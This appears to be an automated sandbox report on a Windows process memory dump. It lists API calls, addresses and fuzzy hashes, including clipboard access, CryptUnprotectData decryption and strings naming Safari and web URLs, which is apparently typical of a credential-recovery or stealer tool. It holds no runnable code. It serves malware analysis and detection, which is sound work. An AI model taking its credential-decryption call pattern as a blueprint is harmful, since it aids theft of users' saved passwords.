• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
• GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1828521557-0
                                                                                                                                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 609303285-0
                                                                                                                                                                                    • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2081463915-0
                                                                                                                                                                                    • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                    • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                                                    • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                                    • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1213725291-0
                                                                                                                                                                                    • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,761EDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NtdllProc_Window
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4255912815-0
                                                                                                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                    • API String ID: 2929817778-1134094380
                                                                                                                                                                                    • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                                                                                    • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
